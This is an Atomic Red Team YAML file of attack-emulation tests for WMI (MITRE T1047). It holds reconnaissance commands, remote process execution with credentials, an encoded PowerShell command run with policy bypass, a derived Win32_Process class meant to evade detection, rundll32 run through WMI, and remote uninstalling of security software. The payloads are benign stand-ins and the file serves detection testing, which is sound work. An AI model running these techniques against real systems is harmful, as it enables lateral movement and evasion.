Théo Letailleur
213 lines
9.5 KiB
YAML
213 lines
9.5 KiB
YAML
attack_technique: T1047
|
||
display_name: Windows Management Instrumentation
|
||
atomic_tests:
|
||
- name: WMI Reconnaissance Users
|
||
auto_generated_guid: c107778c-dcf5-47c5-af2e-1d058a3df3ea
|
||
description: |
|
||
An adversary might use WMI to list all local User Accounts.
|
||
When the test completes , there should be local user accounts information displayed on the command line.
|
||
supported_platforms:
|
||
- windows
|
||
executor:
|
||
command: |
|
||
wmic useraccount get /ALL /format:csv
|
||
name: command_prompt
|
||
- name: WMI Reconnaissance Processes
|
||
auto_generated_guid: 5750aa16-0e59-4410-8b9a-8a47ca2788e2
|
||
description: |
|
||
An adversary might use WMI to list Processes running on the compromised host.
|
||
When the test completes , there should be running processes listed on the command line.
|
||
supported_platforms:
|
||
- windows
|
||
executor:
|
||
command: |
|
||
wmic process get caption,executablepath,commandline /format:csv
|
||
name: command_prompt
|
||
- name: WMI Reconnaissance Software
|
||
auto_generated_guid: 718aebaa-d0e0-471a-8241-c5afa69c7414
|
||
description: |
|
||
An adversary might use WMI to list installed Software hotfix and patches.
|
||
When the test completes, there should be a list of installed patches and when they were installed.
|
||
supported_platforms:
|
||
- windows
|
||
executor:
|
||
command: |
|
||
wmic qfe get description,installedOn /format:csv
|
||
name: command_prompt
|
||
- name: WMI Reconnaissance List Remote Services
|
||
auto_generated_guid: 0fd48ef7-d890-4e93-a533-f7dedd5191d3
|
||
description: |
|
||
An adversary might use WMI to check if a certain Remote Service is running on a remote device.
|
||
When the test completes, a service information will be displayed on the screen if it exists.
|
||
A common feedback message is that "No instance(s) Available" if the service queried is not running.
|
||
A common error message is "Node - (provided IP or default) ERROR Description =The RPC server is unavailable"
|
||
if the provided remote host is unreachable
|
||
supported_platforms:
|
||
- windows
|
||
input_arguments:
|
||
node:
|
||
description: Ip Address
|
||
type: string
|
||
default: 127.0.0.1
|
||
service_search_string:
|
||
description: Name Of Service
|
||
type: string
|
||
default: Spooler
|
||
executor:
|
||
command: |
|
||
wmic /node:"#{node}" service where (caption like "%#{service_search_string}%")
|
||
name: command_prompt
|
||
- name: WMI Execute Local Process
|
||
auto_generated_guid: b3bdfc91-b33e-4c6d-a5c8-d64bee0276b3
|
||
description: |
|
||
This test uses wmic.exe to execute a process on the local host.
|
||
When the test completes , a new process will be started locally .A notepad application will be started when input is left on default.
|
||
supported_platforms:
|
||
- windows
|
||
input_arguments:
|
||
process_to_execute:
|
||
description: Name or path of process to execute.
|
||
type: string
|
||
default: notepad.exe
|
||
executor:
|
||
command: |
|
||
wmic process call create #{process_to_execute}
|
||
cleanup_command: |
|
||
wmic process where name='#{process_to_execute}' delete >nul 2>&1
|
||
name: command_prompt
|
||
- name: WMI Execute Remote Process
|
||
auto_generated_guid: 9c8ef159-c666-472f-9874-90c8d60d136b
|
||
description: |
|
||
This test uses wmic.exe to execute a process on a remote host. Specify a valid value for remote IP using the node parameter.
|
||
To clean up, provide the same node input as the one provided to run the test
|
||
A common error message is "Node - (provided IP or default) ERROR Description =The RPC server is unavailable" if the default or provided IP is unreachable
|
||
supported_platforms:
|
||
- windows
|
||
input_arguments:
|
||
node:
|
||
description: Ip Address
|
||
type: string
|
||
default: 127.0.0.1
|
||
user_name:
|
||
description: Username
|
||
type: string
|
||
default: DOMAIN\Administrator
|
||
password:
|
||
description: Password
|
||
type: string
|
||
default: P@ssw0rd1
|
||
process_to_execute:
|
||
description: Name or path of process to execute.
|
||
type: string
|
||
default: notepad.exe
|
||
executor:
|
||
command: |
|
||
wmic /user:#{user_name} /password:#{password} /node:"#{node}" process call create #{process_to_execute}
|
||
cleanup_command: |
|
||
wmic /user:#{user_name} /password:#{password} /node:"#{node}" process where name='#{process_to_execute}' delete >nul 2>&1
|
||
name: command_prompt
|
||
- name: Create a Process using WMI Query and an Encoded Command
|
||
auto_generated_guid: 7db7a7f9-9531-4840-9b30-46220135441c
|
||
description: |
|
||
Solarigate persistence is achieved via backdoors deployed via various techniques including using PowerShell with an EncodedCommand
|
||
Powershell -nop -exec bypass -EncodedCommand <encoded command>
|
||
Where the –EncodedCommand, once decoded, would resemble:
|
||
Invoke-WMIMethod win32_process -name create -argumentlist ‘rundll32 c:\windows\idmu\common\ypprop.dll _XInitImageFuncPtrs’ -ComputerName WORKSTATION
|
||
The EncodedCommand in this atomic is the following: Invoke-WmiMethod -Path win32_process -Name create -ArgumentList notepad.exe
|
||
You should expect to see notepad.exe running after execution of this test.
|
||
[Solarigate Analysis from Microsoft](https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/)
|
||
supported_platforms:
|
||
- windows
|
||
executor:
|
||
command: |
|
||
powershell -exec bypass -e SQBuAHYAbwBrAGUALQBXAG0AaQBNAGUAdABoAG8AZAAgAC0AUABhAHQAaAAgAHcAaQBuADMAMgBfAHAAcgBvAGMAZQBzAHMAIAAtAE4AYQBtAGUAIABjAHIAZQBhAHQAZQAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIABuAG8AdABlAHAAYQBkAC4AZQB4AGUA
|
||
name: command_prompt
|
||
- name: Create a Process using obfuscated Win32_Process
|
||
auto_generated_guid: 10447c83-fc38-462a-a936-5102363b1c43
|
||
description: |
|
||
This test tries to mask process creation by creating a new class that inherits from Win32_Process. Indirect call of suspicious method such as Win32_Process::Create can break detection logic.
|
||
[Cybereason blog post No Win32_ProcessNeeded](https://www.cybereason.com/blog/wmi-lateral-movement-win32)
|
||
supported_platforms:
|
||
- windows
|
||
input_arguments:
|
||
new_class:
|
||
description: Derived class name
|
||
type: string
|
||
default: Win32_Atomic
|
||
process_to_execute:
|
||
description: Name or path of process to execute.
|
||
type: string
|
||
default: notepad.exe
|
||
executor:
|
||
name: powershell
|
||
elevation_required: true
|
||
command: |
|
||
$Class = New-Object Management.ManagementClass(New-Object Management.ManagementPath("Win32_Process"))
|
||
$NewClass = $Class.Derive("#{new_class}")
|
||
$NewClass.Put()
|
||
Invoke-WmiMethod -Path #{new_class} -Name create -ArgumentList #{process_to_execute}
|
||
cleanup_command: |
|
||
$CleanupClass = New-Object Management.ManagementClass(New-Object Management.ManagementPath("#{new_class}"))
|
||
try { $CleanupClass.Delete() } catch {}
|
||
- name: WMI Execute rundll32
|
||
auto_generated_guid: 00738d2a-4651-4d76-adf2-c43a41dfb243
|
||
description: |
|
||
This test uses wmic.exe to execute a DLL function using rundll32. Specify a valid value for remote IP using the node parameter.
|
||
supported_platforms:
|
||
- windows
|
||
input_arguments:
|
||
node:
|
||
description: Ip Address
|
||
type: string
|
||
default: 127.0.0.1
|
||
dll_to_execute:
|
||
description: Path to DLL.
|
||
type: string
|
||
default: PathToAtomicsFolder\..\ExternalPayloads\calc.dll
|
||
function_to_execute:
|
||
description: Name of DLL function to call
|
||
type: string
|
||
default: StartW
|
||
dependency_executor_name: powershell
|
||
dependencies:
|
||
- description: DLL with function to execute must exist on disk at specified location (#{dll_to_execute})
|
||
prereq_command: |
|
||
if (Test-Path "#{dll_to_execute}") {exit 0} else {exit 1}
|
||
get_prereq_command: |
|
||
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
|
||
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/bin/calc.dll?raw=true" -OutFile "#{dll_to_execute}"
|
||
executor:
|
||
command: |
|
||
wmic /node:#{node} process call create "rundll32.exe \"#{dll_to_execute}\" #{function_to_execute}"
|
||
cleanup_command: |-
|
||
taskkill /f /im calculator.exe
|
||
name: command_prompt
|
||
- name: Application uninstall using WMIC
|
||
auto_generated_guid: c510d25b-1667-467d-8331-a56d3e9bc4ff
|
||
description: Emulates uninstalling applications using WMIC. This method only works if the product was installed with an msi file. APTs have been seen using this to uninstall security products.
|
||
supported_platforms:
|
||
- windows
|
||
input_arguments:
|
||
node:
|
||
description: Computer the action is being executed against but defaults to the localhost.
|
||
type: string
|
||
default: 127.0.0.1
|
||
product:
|
||
description: Enter the product name being uninstalled. This will default to TightVNC.
|
||
type: string
|
||
default: Tightvnc
|
||
dependency_executor_name: powershell
|
||
dependencies:
|
||
- description: TightVNC must be installed.
|
||
prereq_command: if ((Test-Path "C:\Program Files\TightVNC\tvnviewer.exe")-Or (Test-Path "C:\Program Files (x86)\TightVNC\tvnviewer.exe")) {exit 0} else {exit 1}
|
||
get_prereq_command: |-
|
||
Invoke-WebRequest 'https://www.tightvnc.com/download/2.8.63/tightvnc-2.8.63-gpl-setup-64bit.msi' -OutFile "PathToAtomicsFolder\..\ExternalPayloads\tightvncinstaller.msi"
|
||
start-sleep -s 10
|
||
msiexec /i "PathToAtomicsFolder\..\ExternalPayloads\tightvncinstaller.msi" /qn /norestart
|
||
start-sleep -s 15
|
||
executor:
|
||
command: wmic /node:"#{node}" product where "name like '#{product}%%'" call uninstall
|
||
cleanup_command: msiexec /i "PathToAtomicsFolder\..\ExternalPayloads\tightvncinstaller.msi" /qn /norestart
|
||
name: command_prompt
|
||
elevation_required: true
|